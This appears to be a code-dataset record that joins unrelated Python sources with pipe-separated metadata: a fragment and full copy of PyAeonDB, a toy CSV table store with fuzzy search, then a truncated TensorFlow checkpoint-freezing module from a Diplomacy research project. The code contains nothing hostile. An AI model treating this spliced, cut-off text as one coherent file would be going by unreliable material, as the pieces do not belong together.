    help.
    """
    print("%s AeonDB 1.0 beta 65" % timestamp())
    print(u"%s Copyright © 2011-2018 by Kronosaur Productions LLC. All Rights Reserved." % timestamp())
    loadAllTables()
    args = prompt()
    while args[0] != "quit":
        # createtable
        if args[0] == "createtable":
            if len(args) < 2:
                print(g_cmdHelpMap.get(args[0]))
            else:
                print("Not implemented for demo.")
        # getrows
        elif args[0] == "getrows":
            if len(args) < 4:
                print(g_cmdHelpMap.get(args[0]))
            else:
                print("Not implemented for demo.")
        # importtable
        elif args[0] == "importtable":
            if len(args) < 3:
                print(g_cmdHelpMap.get(args[0]))
            else:
                # Normalise the filespec: strip quotes, use backslashes.
                csvName = args[2]
                csvName = csvName.replace('"', "")
                csvName = csvName.replace("'", "")
                csvName = csvName.replace("/", "\\")
                try:
                    tableObj = importCsv(csvName)
                    print("Imported %d rows to table %s." % (len(tableObj), args[1]))
                    g_tables.update({args[1] : tableObj})
                    print("Saving table %s to file." % args[1])
                    writeTable(args[1], tableObj)
                except:
                    print("Failed to import table. Check URI.")
        # listtables
        elif args[0] == "listtables":
            if len(args) < 1:
                print(g_cmdHelpMap.get(args[0]))
            else:
                for x in listTables():
                    print(x)
        # indextable
        elif args[0] == "indextable":
            if len(args) < 2:
                print(g_cmdHelpMap.get(args[0]))
            else:
                if args[1] in g_tables:
                    # Rebuild all three search structures, then persist them.
                    tableIndex, tableFuzzy1, tableFuzzy2 = createIndex(g_tables.get(args[1]))
                    g_indices.update({args[1] : tableIndex})
                    g_fuzzyDict.update({args[1] : tableFuzzy1})
                    g_fuzzyDict2.update({args[1] : tableFuzzy2})
                    try:
                        print("Saving index %s." % args[1])
                        writeIndex(args[1], tableIndex)
                        print("Saving fuzzy %s." % args[1])
                        writeFuzzy(args[1], tableFuzzy1)
                        print("Saving fuzzy2 %s." % args[1])
                        writeFuzzy2(args[1], tableFuzzy2)
                    except:
                        print("Failed to write index to file.")
                else:
                    print("Table %s does not exist." % args[1])
        # find
        elif args[0] == "find":
            if len(args) < 3:
                print(g_cmdHelpMap.get(args[0]))
            else:
                if args[1] not in g_tables:
                    print("Table %s does not exist." % args[1])
                elif args[1] not in g_indices:
                    print("Index %s does not exist." % args[1])
                elif args[1] not in g_fuzzyDict:
                    print("Fuzzy1 %s does not exist." % args[1])
                elif args[1] not in g_fuzzyDict2:
                    print("Fuzzy2 %s does not exist." % args[1])
                else:
                    results = find(set(args[2:]), g_tables.get(args[1]), g_indices.get(args[1]), g_fuzzyDict.get(args[1]), g_fuzzyDict2.get(args[1]), False)
                    for row in results:
                        print(row)
                    print("Found %d rows." % len(results))
        # fuzzysearch
        elif args[0] == "fuzzysearch":
            if len(args) < 3:
                print(g_cmdHelpMap.get(args[0]))
            else:
                if args[1] not in g_tables:
                    print("Table %s does not exist." % args[1])
                elif args[1] not in g_indices:
                    print("Index %s does not exist." % args[1])
                elif args[1] not in g_fuzzyDict:
                    print("Fuzzy1 %s does not exist." % args[1])
                elif args[1] not in g_fuzzyDict2:
                    print("Fuzzy2 %s does not exist." % args[1])
                else:
                    results = find(set(args[2:]), g_tables.get(args[1]), g_indices.get(args[1]), g_fuzzyDict.get(args[1]), g_fuzzyDict2.get(args[1]), True)
                    for row in results:
                        print(row)
                    print("Found %d rows." % len(results))
        # Bad commands
        else:
            printHelp()
        # Next loop
        args = prompt()
    return None
main() | PyAeonDB/PyAeonDB.py | from typing import List, Set, Dict, Tuple
import csv
import os
import json
import time
import datetime
# ---- Type aliases for the persisted structures ----
Table = List[str]  # a table is a list of rows, each row one space-joined string
Index = Dict[str, List[int]]  # term -> ids of the rows containing it
Fuzzy = Dict[str, List[str]]  # term (or bigram) -> related terms
# ---- On-disk layout; %s is the table name.
# NOTE(review): paths are hard-coded for Windows -- confirm before porting.
ROOT_PATH = "C:/Arcology/AeonDB"
TABLE_DIR = "C:/Arcology/AeonDB/%s"
TABLE_PATH = "C:/Arcology/AeonDB/%s/table.txt"
INDEX_PATH = "C:/Arcology/AeonDB/%s/index.txt"
FUZZY_PATH = "C:/Arcology/AeonDB/%s/fuzzy.txt"
FUZZY2_PATH = "C:/Arcology/AeonDB/%s/fuzzy2.txt"
# ---- In-memory caches, keyed by table name ----
g_tables: Dict[str, Table] = dict()
g_indices: Dict[str, Index] = dict()
g_fuzzyDict: Dict[str, Fuzzy] = dict()
g_fuzzyDict2: Dict[str, Fuzzy] = dict()
def readTable(tableName: str) -> Table:
    """Load a table's rows from its JSON file under the AeonDB root.

    Raises OSError if the file is missing, json.JSONDecodeError if corrupt.
    """
    os.makedirs(TABLE_DIR % tableName, exist_ok=True)
    # Context managers close the handles deterministically; the originals
    # left every file open until garbage collection.
    with open(TABLE_PATH % tableName) as tableFile:
        return json.load(tableFile)
def writeTable(tableName: str, table: Table) -> None:
    """Persist *table* as JSON under the AeonDB root."""
    os.makedirs(TABLE_DIR % tableName, exist_ok=True)
    with open(TABLE_PATH % tableName, 'w+') as tableFile:
        json.dump(table, tableFile)
    return None
def readIndex(tableName: str) -> Index:
    """Load a table's inverted index (term -> row ids) from disk."""
    os.makedirs(TABLE_DIR % tableName, exist_ok=True)
    with open(INDEX_PATH % tableName) as indexFile:
        return json.load(indexFile)
def writeIndex(tableName: str, index: Index) -> None:
    """Persist a table's inverted index as JSON."""
    os.makedirs(TABLE_DIR % tableName, exist_ok=True)
    with open(INDEX_PATH % tableName, 'w+') as indexFile:
        json.dump(index, indexFile)
    return None
def readFuzzy(tableName: str) -> Fuzzy:
    """Load the term -> related-terms map from disk."""
    os.makedirs(TABLE_DIR % tableName, exist_ok=True)
    with open(FUZZY_PATH % tableName) as fuzzyFile:
        return json.load(fuzzyFile)
def writeFuzzy(tableName: str, fuzzy: Fuzzy) -> None:
    """Persist the term -> related-terms map as JSON."""
    os.makedirs(TABLE_DIR % tableName, exist_ok=True)
    with open(FUZZY_PATH % tableName, 'w+') as fuzzyFile:
        json.dump(fuzzy, fuzzyFile)
    return None
def readFuzzy2(tableName: str) -> Fuzzy:
    """Load the bigram -> terms map from disk."""
    os.makedirs(TABLE_DIR % tableName, exist_ok=True)
    with open(FUZZY2_PATH % tableName) as fuzzyFile:
        return json.load(fuzzyFile)
def writeFuzzy2(tableName: str, fuzzy: Fuzzy) -> None:
    """Persist the bigram -> terms map as JSON."""
    os.makedirs(TABLE_DIR % tableName, exist_ok=True)
    with open(FUZZY2_PATH % tableName, 'w+') as fuzzyFile:
        json.dump(fuzzy, fuzzyFile)
    return None
def listTables() -> List[str]:
    """Return the names of all table directories under the AeonDB root.

    Creates the root directory first so a fresh install yields [].
    """
    os.makedirs(ROOT_PATH, exist_ok=True)
    return os.listdir(ROOT_PATH)
def timestamp() -> str:
    """Current local time formatted as MM/DD/YYYY HH:MM:SS (for log lines)."""
    now = datetime.datetime.fromtimestamp(time.time())
    return now.strftime("%m/%d/%Y %H:%M:%S")
# Usage strings shown by printHelp(), keyed by lowercased command name.
g_cmdHelpMap = {
    "createtable" : "createTable {tableDesc}",
    "getrows" : "getRows {tableName} {key} {count}",
    "importtable" : "importTable {tableName} {CSV filespec}",
    "listtables" : "listTables",
    "indextable" : "indexTable {tableName}",
    "find" : "find {tableName} {term1 term2 term3...}",
    "fuzzysearch" : "fuzzySearch {tableName} {term1 term2 term3...}",
    "quit" : "quit"
}
def printHelp() -> None:
    """Print the usage line of every known command, one per line."""
    for usage in g_cmdHelpMap.values():
        print(usage)
    return
def toBigrams(s: str) -> Set[str]:
    """Return the set of character bigrams of *s*.

    Strings shorter than two characters yield {s} itself, so the result
    is never empty.
    """
    if len(s) < 2:
        return {s}
    return {s[i:i + 2] for i in range(len(s) - 1)}
def dicesCoefficient(a: Set[str], b: Set[str]) -> float:
    """Sorensen-Dice similarity of two bigram sets: 2*|a&b| / (|a|+|b|)."""
    overlap = len(a & b)
    return 2.0 * overlap / (len(a) + len(b))
# Characters preprocess() treats as term separators: ASCII punctuation
# (minus whitespace) and the decimal digits -- exactly the set the
# original 44 chained .replace() calls covered.
_SEPARATORS = "~`!@#$%^&*()-_+={}[]|\\;:\"'<>,./?1234567890"
_SEPARATOR_TABLE = str.maketrans({ch: " " for ch in _SEPARATORS})
def preprocess(s: str) -> str:
    """Replace punctuation and digits in *s* with spaces.

    Single C-level pass via str.translate instead of 44 chained
    .replace() calls; output is byte-identical to the original.
    """
    return s.translate(_SEPARATOR_TABLE)
def createIndex(table: Table) -> Tuple[Index, Fuzzy, Fuzzy]:
    """Build the inverted index and fuzzy-match tables for *table*.

    Returns (index, fuzzy1, fuzzy2) where:
      * index  maps each term to the ids of the rows containing it,
      * fuzzy1 maps each term to all indexed terms whose bigram Dice
        coefficient with it exceeds 0.6 (including the term itself),
      * fuzzy2 maps each bigram to the terms containing it.
    """
    startTime = time.time()
    index: Index = dict()
    fuzzy1: Fuzzy = dict()
    fuzzy2: Fuzzy = dict()
    # term -> its bigram set; memoised so each term is decomposed once.
    fuzzy3: Dict[str, Set[str]] = dict()
    for rowId in range(len(table)):
        row = table[rowId]
        # Strip punctuation/digits, lowercase, and split into unique terms.
        row = preprocess(row).lower()
        terms = set(row.split())
        if "" in terms:
            terms.remove("")
        for term in terms:
            if term not in index:
                index.update({term: list()})
            rowIds = index.get(term)
            if rowId not in rowIds:
                rowIds.append(rowId)
            if term not in fuzzy3:
                # First occurrence of this term: register its bigrams and
                # link it (in both directions) with every similar term.
                atLeastOneBigram = set()
                bigrams = toBigrams(term)
                fuzzy3.update({term: bigrams})
                for bigram in bigrams:
                    if bigram not in fuzzy2:
                        fuzzy2.update({bigram: list()})
                    bigramList = fuzzy2.get(bigram)
                    bigramList.append(term)
                    # Candidates: terms sharing at least one bigram.
                    atLeastOneBigram.update(bigramList)
                related = list()
                for term2 in atLeastOneBigram:
                    if term == term2:
                        related.append(term2)
                    elif dicesCoefficient(fuzzy3.get(term), fuzzy3.get(term2)) > 0.6:
                        related.append(term2)
                        # Keep the relation symmetric for the earlier term.
                        fuzzy1.get(term2).append(term)
                fuzzy1.update({term: related})
        print("Indexed row %d of %d." % (rowId, len(table)))
    print("Indexing Time: " + str(time.time() - startTime))
    return index, fuzzy1, fuzzy2
def importCsv(filename: str) -> "Table":
    """Read a CSV file and return its rows as single space-joined strings.

    The first row is assumed to be a header and is dropped; an empty file
    yields [] (the original raised IndexError).  Raises OSError if the
    file cannot be opened.  The return annotation is quoted so the helper
    can also be imported standalone.
    """
    # newline='' is the csv-module recommended open mode; the context
    # manager closes the handle (the original leaked it).
    with open(filename, newline='') as csvFile:
        table = [" ".join(row) for row in csv.reader(csvFile)]
    if table:  # guard: nothing to pop from an empty file
        table.pop(0)
    return table
def expandQuery(term: str, index: Index, fuzzy: Fuzzy, fuzzy2: Fuzzy) -> Set[int]:
    """Return the row ids matching *term* or any term fuzzily related to it.

    A term already in *fuzzy* uses its precomputed related-terms list;
    otherwise candidates sharing at least one bigram are rescored on the
    fly and kept when their Dice coefficient exceeds 0.6.
    """
    if term in fuzzy:
        relateds = fuzzy.get(term)
    else:
        bigrams = toBigrams(term)
        candidates = set()
        for bigram in bigrams:
            if bigram in fuzzy2:
                candidates.update(fuzzy2.get(bigram))
        relateds = {cand for cand in candidates
                    if dicesCoefficient(toBigrams(cand), bigrams) > 0.6}
    rowIds = set()
    for related in relateds:
        rowIds.update(index.get(related))
    return rowIds
def find(keyTerms: Set[str], table: Table, index: Index, fuzzy: Fuzzy, fuzzy2: Fuzzy, isFuzzy: bool) -> Table:
    """Return the rows of *table* matching every term in *keyTerms*.

    Terms are lowercased and AND-ed together.  With ``isFuzzy`` each term
    is expanded via ``expandQuery``; otherwise any term missing from the
    index short-circuits to no results.
    """
    remaining = {term.lower() for term in keyTerms}
    matches = list()

    def rowsFor(term):
        # Row ids matching a single term, or None if the term is unknown.
        if isFuzzy:
            return expandQuery(term, index, fuzzy, fuzzy2)
        if term in index:
            return set(index.get(term))
        return None

    rowIds = rowsFor(remaining.pop())
    if rowIds is None:
        return matches
    for term in remaining:
        termRows = rowsFor(term)
        if termRows is None:
            return matches
        rowIds.intersection_update(termRows)
    for rowId in rowIds:
        matches.append(table[rowId])
    return matches
def loadAllTables() -> None:
    """Load every table's table/index/fuzzy files into the module caches.

    Each of the four files is loaded independently: a missing or corrupt
    file only skips that cache entry (with a log line), it never aborts
    startup.
    """
    tableNames = listTables()
    for tableName in tableNames:
        print("%s Log.info: Table %s: Backup volume offline. Waiting for new volume." % (timestamp(), tableName))
        try:
            table = readTable(tableName)
            g_tables.update({tableName: table})
            print("%s Log.info: Table %s: Recovered %d rows." % (timestamp(), tableName, len(table)))
        except OSError:
            print("%s Log.info: Table %s: Could not read file." % (timestamp(), tableName))
        except json.JSONDecodeError:
            print("%s Log.info: Table %s: File is corrupted." % (timestamp(), tableName))
        try:
            index = readIndex(tableName)
            g_indices.update({tableName: index})
            print("%s Log.info: Index %s: Recovered %d terms." % (timestamp(), tableName, len(index)))
        except OSError:
            print("%s Log.info: Index %s: Could not read file." % (timestamp(), tableName))
        except json.JSONDecodeError:
            print("%s Log.info: Index %s: File is corrupted." % (timestamp(), tableName))
        try:
            fuzzy = readFuzzy(tableName)
            g_fuzzyDict.update({tableName: fuzzy})
            print("%s Log.info: Fuzzy %s: Recovered %d terms." % (timestamp(), tableName, len(fuzzy)))
        except OSError:
            print("%s Log.info: Fuzzy %s: Could not read file." % (timestamp(), tableName))
        except json.JSONDecodeError:
            print("%s Log.info: Fuzzy %s: File is corrupted." % (timestamp(), tableName))
        try:
            fuzzy2 = readFuzzy2(tableName)
            g_fuzzyDict2.update({tableName: fuzzy2})
            print("%s Log.info: Fuzzy2 %s: Recovered %d terms." % (timestamp(), tableName, len(fuzzy2)))
        except OSError:
            print("%s Log.info: Fuzzy2 %s: Could not read file." % (timestamp(), tableName))
        except json.JSONDecodeError:
            print("%s Log.info: Fuzzy2 %s: File is corrupted." % (timestamp(), tableName))
    print("AeonDB ready. %d tables available." % len(tableNames))
    return None
def prompt() -> List[str]:
    """Read one command line from stdin and return its whitespace-split
    tokens with the command name lowercased.

    Re-prompts until at least one token is entered, so pressing Enter on
    an empty line no longer crashes the REPL with an IndexError.
    """
    while True:
        args = input(" : ").split()
        if args:
            args[0] = args[0].lower()
            return args
def main() -> None:
    """AeonDB interactive command loop.

    Loads every table from disk, then reads commands from stdin until
    "quit".  Commands are dispatched on their lowercased first token;
    under-length commands print their usage line, unknown ones the full
    help.
    """
    print("%s AeonDB 1.0 beta 65" % timestamp())
    print(u"%s Copyright © 2011-2018 by Kronosaur Productions LLC. All Rights Reserved." % timestamp())
    loadAllTables()
    args = prompt()
    while args[0] != "quit":
        # createtable
        if args[0] == "createtable":
            if len(args) < 2:
                print(g_cmdHelpMap.get(args[0]))
            else:
                print("Not implemented for demo.")
        # getrows
        elif args[0] == "getrows":
            if len(args) < 4:
                print(g_cmdHelpMap.get(args[0]))
            else:
                print("Not implemented for demo.")
        # importtable
        elif args[0] == "importtable":
            if len(args) < 3:
                print(g_cmdHelpMap.get(args[0]))
            else:
                # Normalise the filespec: strip quotes, use backslashes.
                csvName = args[2]
                csvName = csvName.replace('"', "")
                csvName = csvName.replace("'", "")
                csvName = csvName.replace("/", "\\")
                try:
                    tableObj = importCsv(csvName)
                    print("Imported %d rows to table %s." % (len(tableObj), args[1]))
                    g_tables.update({args[1] : tableObj})
                    print("Saving table %s to file." % args[1])
                    writeTable(args[1], tableObj)
                except:
                    print("Failed to import table. Check URI.")
        # listtables
        elif args[0] == "listtables":
            if len(args) < 1:
                print(g_cmdHelpMap.get(args[0]))
            else:
                for x in listTables():
                    print(x)
        # indextable
        elif args[0] == "indextable":
            if len(args) < 2:
                print(g_cmdHelpMap.get(args[0]))
            else:
                if args[1] in g_tables:
                    # Rebuild all three search structures, then persist them.
                    tableIndex, tableFuzzy1, tableFuzzy2 = createIndex(g_tables.get(args[1]))
                    g_indices.update({args[1] : tableIndex})
                    g_fuzzyDict.update({args[1] : tableFuzzy1})
                    g_fuzzyDict2.update({args[1] : tableFuzzy2})
                    try:
                        print("Saving index %s." % args[1])
                        writeIndex(args[1], tableIndex)
                        print("Saving fuzzy %s." % args[1])
                        writeFuzzy(args[1], tableFuzzy1)
                        print("Saving fuzzy2 %s." % args[1])
                        writeFuzzy2(args[1], tableFuzzy2)
                    except:
                        print("Failed to write index to file.")
                else:
                    print("Table %s does not exist." % args[1])
        # find
        elif args[0] == "find":
            if len(args) < 3:
                print(g_cmdHelpMap.get(args[0]))
            else:
                if args[1] not in g_tables:
                    print("Table %s does not exist." % args[1])
                elif args[1] not in g_indices:
                    print("Index %s does not exist." % args[1])
                elif args[1] not in g_fuzzyDict:
                    print("Fuzzy1 %s does not exist." % args[1])
                elif args[1] not in g_fuzzyDict2:
                    print("Fuzzy2 %s does not exist." % args[1])
                else:
                    results = find(set(args[2:]), g_tables.get(args[1]), g_indices.get(args[1]), g_fuzzyDict.get(args[1]), g_fuzzyDict2.get(args[1]), False)
                    for row in results:
                        print(row)
                    print("Found %d rows." % len(results))
        # fuzzysearch
        elif args[0] == "fuzzysearch":
            if len(args) < 3:
                print(g_cmdHelpMap.get(args[0]))
            else:
                if args[1] not in g_tables:
                    print("Table %s does not exist." % args[1])
                elif args[1] not in g_indices:
                    print("Index %s does not exist." % args[1])
                elif args[1] not in g_fuzzyDict:
                    print("Fuzzy1 %s does not exist." % args[1])
                elif args[1] not in g_fuzzyDict2:
                    print("Fuzzy2 %s does not exist." % args[1])
                else:
                    results = find(set(args[2:]), g_tables.get(args[1]), g_indices.get(args[1]), g_fuzzyDict.get(args[1]), g_fuzzyDict2.get(args[1]), True)
                    for row in results:
                        print(row)
                    print("Found %d rows." % len(results))
        # Bad commands
        else:
            printHelp()
        # Next loop
        args = prompt()
    return None
main() | 0.395718 | 0.168344 |
from datetime import datetime
import glob
import logging
import os
from pydoc import locate
import shutil
import sys
import time
from pytz import timezone
from diplomacy_research.models.datasets.base_builder import BaseBuilder
# Constants
LOGGER = logging.getLogger(__name__)
# Version-directory prefix -> package implementing that policy family.
# NOTE(review): consumers of this mapping are outside this chunk -- confirm
# the prefixes match the frozen-model directory layout before changing.
MODEL_PATHS = {'/token_based/v': 'diplomacy_research/models/policy/token_based',
               '/order_based/v': 'diplomacy_research/models/policy/order_based'}
def load_graph_from_ckpt(checkpoint_path, meta_graph_path=None, graph=None, session=None):
    """ Builds a graph and a session from a specific checkpoint
        This loads the model into a new graph, and doesn't affect the default graph
        :param checkpoint_path: The checkpoint path. Can be a checkpoint directory, or a specific checkpoint in
                                that directory
        :param meta_graph_path: (Optional) The path to the saved meta graph (.meta). Will be detected automatically
                                if not provided
        :param graph: The graph object were to load the model. A new graph will be created if not provided.
        :param session: The session object to use to load the model. A new session will be created if not provided.
        :return: The graph and the session object where the checkpoint was loaded.
        :type graph: tensorflow.python.framework.ops.Graph
        :type session: tensorflow.python.client.session.Session
    """
    # Imported locally to avoid paying the TensorFlow import cost at module load.
    from diplomacy_research.utils.tensorflow import tf
    dir_path, filename = os.path.split(checkpoint_path)
    # checkpoint_path is a directory - Loading latest checkpoint in directory
    if os.path.isdir(checkpoint_path):
        checkpoint = tf.train.latest_checkpoint(checkpoint_path)
        if meta_graph_path is None:
            # Most recently created .meta file is assumed to match the checkpoint.
            meta_graph_path = max(glob.iglob(os.path.join(checkpoint_path, '*.meta')), key=os.path.getctime)
    # checkpoint_path is a checkpoint file - Loading latest checkpoint in directory
    elif filename == 'checkpoint':
        checkpoint = tf.train.latest_checkpoint(dir_path, 'checkpoint')
        if meta_graph_path is None:
            meta_graph_path = max(glob.iglob(os.path.join(dir_path, '*.meta')), key=os.path.getctime)
    # Loading a specific checkpoint
    else:
        # Removing extension
        # (e.g. "model.ckpt-123.index" -> "model.ckpt-123", keeping two dot parts)
        if len(filename.split('.')) > 2:
            checkpoint_path = os.path.join(dir_path, '.'.join(filename.split('.')[:2]))
        checkpoint = checkpoint_path
        if meta_graph_path is None:
            # Prefer the checkpoint's own .meta; fall back to the newest in the dir.
            if os.path.exists('{}.meta'.format(checkpoint_path)):
                meta_graph_path = '{}.meta'.format(checkpoint_path)
            else:
                meta_graph_path = max(glob.iglob(os.path.join(dir_path, '*.meta')), key=os.path.getctime)
    # Loading the checkpoint in the graph
    graph = tf.Graph() if graph is None else graph
    with graph.as_default():
        session = tf.Session(graph=graph) if session is None else session
        saver = tf.train.import_meta_graph(meta_graph_path)
        saver.restore(session, checkpoint)
    # Returning graph and session
    return graph, session
def freeze_graph(frozen_dir, version_id, graph, session, history_saver=None):
    """ Freezes a graph and saves a checkpoint and the frozen graph to disk
        :param frozen_dir: The path where to save the checkpoint and frozen graph
        :param version_id: Integer. The version id to append to the filename.
        :param graph: The graph object to save
        :param session: The session associated with the graph
        :param history_saver: Optional. The saver to use to save historical checkpoints, otherwise no checkpoints will
                              be created and the graph will only be frozen.
        :return: Nothing
        :type graph: tensorflow.python.framework.ops.Graph
        :type session: tensorflow.python.client.session.Session
    """
    # Versioned file names for this freeze operation
    checkpoint_path = os.path.join(frozen_dir, 'checkpoint-v%09d' % version_id)
    frozen_path = os.path.join(frozen_dir, 'frozen_graph-v%09d.pb' % version_id)

    # Making sure frozen directory exists.
    # exist_ok=True already tolerates a pre-existing directory, so the former
    # `if not os.path.exists(...)` guard was redundant (and racy).
    os.makedirs(frozen_dir, exist_ok=True)

    # Creating a checkpoint (only when a history saver was provided)
    if history_saver is not None:
        with graph.as_default():
            history_saver.save(session, checkpoint_path)

    # Freezing graph - checkpoint_path=None because the live graph/session pair is passed directly
    convert_ckpt_to_frozen_graph(checkpoint_path=None,
                                 frozen_graph_path=frozen_path,
                                 graph=graph,
                                 session=session)
def build_saved_model(saved_model_dir, version_id, signature, proto_fields, graph, session, history_saver=None):
    """ Builds a SavedModel and a checkpoint from the graph
        :param saved_model_dir: The path where to save the checkpoint and SavedModel
        :param version_id: Integer. The version_id of the SavedModel to save.
        :param signature: The output of adapter.get_signature() - signature of all the possible calls
        :param proto_fields: A dictionary of features name with their proto field description
        :param graph: The graph object to save
        :param session: The session associated with the graph
        :param history_saver: Optional. The saver to use to save historical checkpoints, otherwise no checkpoints will
                              be created and the graph will only be converted to SavedModel.
        :return: Nothing
        :type graph: tensorflow.python.framework.ops.Graph
        :type session: tensorflow.python.client.session.Session
    """
    # Versioned file names - the SavedModel itself lives in a bare '%09d' sub-directory
    checkpoint_path = os.path.join(saved_model_dir, 'checkpoint-v%09d' % version_id)
    saved_model_path = os.path.join(saved_model_dir, '%09d' % version_id)

    # Making sure saved model directory exists.
    # exist_ok=True already tolerates a pre-existing directory, so the former
    # `if not os.path.exists(...)` guard was redundant (and racy).
    os.makedirs(saved_model_dir, exist_ok=True)

    # Creating a checkpoint (only when a history saver was provided)
    if history_saver is not None:
        with graph.as_default():
            history_saver.save(session, checkpoint_path)

    # Building saved model - checkpoint_path=None because the live graph/session pair is passed directly
    convert_ckpt_to_saved_model(checkpoint_path=None,
                                saved_model_path=saved_model_path,
                                signature=signature,
                                proto_fields=proto_fields,
                                graph=graph,
                                session=session)
def convert_ckpt_to_frozen_graph(checkpoint_path, frozen_graph_path, meta_graph_path=None, graph=None, session=None):
    """ Converts a checkpoint to a frozen (meta) graph with fixed weights for faster inference
        :param checkpoint_path: The path to the checkpoint file (can be a directory, or a checkpoint file)
        :param frozen_graph_path: The path where to save the frozen graph
        :param meta_graph_path: Optional. The path of the meta_graph. Will be detected automatically if not provided.
        :param graph: The graph object where to load the model. A new graph will be created if not provided.
        :param session: The session object to use to load the model. A new session will be created if not provided.
        :return: The graph and the session object used to load the checkpoint.
        :type graph: tensorflow.python.framework.ops.Graph
        :type session: tensorflow.python.client.session.Session
    """
    # Deferred import so TensorFlow is only loaded when this function is actually used
    from diplomacy_research.utils.tensorflow import tf, graph_util, variables
    # Loading the checkpoint from disk (skipped when a live graph/session pair was supplied)
    if graph is None or session is None:
        graph, session = load_graph_from_ckpt(checkpoint_path,
                                              meta_graph_path=meta_graph_path,
                                              graph=graph,
                                              session=session)
    # Converting graph to constant
    # Keeping only collection keys that look like inference outputs: variables, train steps,
    # ops, contexts, private ('_'-prefixed) keys, tensor arrays, summaries and trainable
    # flags are all filtered out.
    input_graph_def = graph.as_graph_def()
    output_keys = [k for k in graph.get_all_collection_keys() if ('variable' not in k.lower()
                                                                  and '_step' not in k
                                                                  and '_op' not in k
                                                                  and '_context' not in k
                                                                  and not k.startswith('_')
                                                                  and not k.endswith('_ta')
                                                                  and 'summaries' not in k
                                                                  and 'is_trainable' not in k)]
    # Making sure we are saving an iterator, otherwise the model will not be usable
    if not [key for key in output_keys if 'iterator_resource' in key]:
        LOGGER.error('Trying to freeze a model without an "iterator_resource" key. Model will not be usable. Aborting')
        raise RuntimeError('Missing "iterator_resource" to freeze model.')
    # Finding output nodes and extra tags.
    # Collection entries with a .name attribute are graph nodes to keep; anything else
    # (plain Python values) is preserved as an "extra tag" re-attached after freezing.
    extra_tags = {}
    output_nodes = []
    for key in output_keys:
        nodes_in_collection = graph.get_collection(key)
        for node in nodes_in_collection:
            if isinstance(node, variables.PartitionedVariable):
                # Partitioned variables expose their shards through a private list
                output_nodes += [var.name for var in node._get_variable_list()]     # pylint: disable=protected-access
            elif hasattr(node, 'name'):
                output_nodes += [node.name]
            else:
                extra_tags.setdefault(key, [])
                extra_tags[key] += [node]
    # Freezing graph - converts every variable reachable from the output nodes into a constant.
    # convert_variables_to_constants expects op names, hence the ':0'-suffix stripping.
    output_graph_def = graph_util.convert_variables_to_constants(session,
                                                                 input_graph_def,
                                                                 [node.split(':')[0] for node in output_nodes])
    # Storing date/time, original filename, and launch args as provenance tags
    created_date = datetime.fromtimestamp(time.time(), timezone('America/Montreal'))
    extra_tags['tag/created_date'] = [created_date.strftime("%Y-%m-%d %H:%M:%S %Z")]
    extra_tags['tag/filename'] = [frozen_graph_path.split('/')[-1]]
    extra_tags['tag/launch_cmd'] = [' '.join(sys.argv)]
    # Importing in a new graph (nodes get an 'import/' name prefix)
    output_graph = tf.Graph()
    with output_graph.as_default():
        tf.import_graph_def(output_graph_def)
    # Transferring collections from the source graph to the frozen graph
    collection_keys = graph.get_all_collection_keys()
    for key in collection_keys:
        if 'variable' in key.lower() or '_op' in key:
            continue
        nodes = graph.get_collection(key)
        for node in nodes:
            if hasattr(node, 'name'):
                try:
                    # Appending ':0' when the name has no output index, to form a valid tensor name
                    tensor_name = 'import/{}{}'.format(node.name, ':0' if ':' not in node.name else '')
                    tensor_node = output_graph.get_tensor_by_name(tensor_name)
                    output_graph.add_to_collection(key, tensor_node)
                except KeyError:
                    # Node was pruned during freezing - silently dropped from the collection
                    pass
    # Adding extra tags (plain values carried over from the source collections)
    for key in extra_tags:
        for value in extra_tags[key]:
            output_graph.add_to_collection(key, value)
    # Saving the frozen graph to disk
    with output_graph.as_default():
        tf.train.export_meta_graph(frozen_graph_path,
                                   graph_def=output_graph.as_graph_def(),
                                   clear_devices=True)
    # Returning the *source* graph/session pair (not the frozen output_graph)
    return graph, session
def convert_ckpt_to_saved_model(checkpoint_path, saved_model_path, signature, proto_fields, meta_graph_path=None,
                                graph=None, session=None):
    """ Converts a checkpoint to a SavedModel with fixed weights for faster inference
        :param checkpoint_path: The path to the checkpoint file (can be a directory, or a checkpoint file)
        :param saved_model_path: The path where to save the SavedModel
        :param signature: The output of adapter.get_signature() - signature of all the possible calls
        :param proto_fields: A dictionary of features name with their proto field description
        :param meta_graph_path: Optional. The path of the meta_graph. Will be detected automatically if not provided.
        :param graph: The graph object where to load the model. A new graph will be created if not provided.
        :param session: The session object to use to load the model. A new session will be created if not provided.
        :return: The graph and the session object used to load the checkpoint.
        :type graph: tensorflow.python.framework.ops.Graph
        :type session: tensorflow.python.client.session.Session
    """
    # Deferred import so TensorFlow is only loaded when this function is actually used
    from diplomacy_research.utils.tensorflow import tf, graph_util, build_tensor_info, saved_model_builder, \
        signature_def_utils, tag_constants, variables, PREDICT_METHOD_NAME
    # Loading the checkpoint from disk (skipped when a live graph/session pair was supplied)
    if graph is None or session is None:
        graph, session = load_graph_from_ckpt(checkpoint_path,
                                              meta_graph_path=meta_graph_path,
                                              graph=graph,
                                              session=session)
    # Converting graph to constant
    # Keeping only collection keys that look like inference outputs: variables, train steps,
    # ops, contexts, private ('_'-prefixed) keys, tensor arrays, summaries and trainable
    # flags are all filtered out.
    input_graph_def = graph.as_graph_def()
    output_keys = [k for k in graph.get_all_collection_keys() if ('variable' not in k.lower()
                                                                  and '_step' not in k
                                                                  and '_op' not in k
                                                                  and '_context' not in k
                                                                  and not k.startswith('_')
                                                                  and not k.endswith('_ta')
                                                                  and 'summaries' not in k
                                                                  and 'is_trainable' not in k)]
    # Finding output nodes and extra tags.
    # Collection entries with a .name attribute are graph nodes to keep; anything else
    # (plain Python values) is preserved as an "extra tag" re-attached after freezing.
    extra_tags = {}
    output_nodes = []
    for key in output_keys:
        nodes_in_collection = graph.get_collection(key)
        for node in nodes_in_collection:
            if isinstance(node, variables.PartitionedVariable):
                # Partitioned variables expose their shards through a private list
                output_nodes += [var.name for var in node._get_variable_list()]     # pylint: disable=protected-access
            elif hasattr(node, 'name'):
                output_nodes += [node.name]
            else:
                extra_tags.setdefault(key, [])
                extra_tags[key] += [node]
    # Converting graph to constant - convert_variables_to_constants expects op names,
    # hence the ':0'-suffix stripping.
    output_graph_def = graph_util.convert_variables_to_constants(session,
                                                                 input_graph_def,
                                                                 [node.split(':')[0] for node in output_nodes])
    # Storing date/time, original filename, and launch args as provenance tags
    created_date = datetime.fromtimestamp(time.time(), timezone('America/Montreal'))
    extra_tags['tag/created_date'] = [created_date.strftime("%Y-%m-%d %H:%M:%S %Z")]
    extra_tags['tag/filename'] = [saved_model_path.split('/')[-1]]
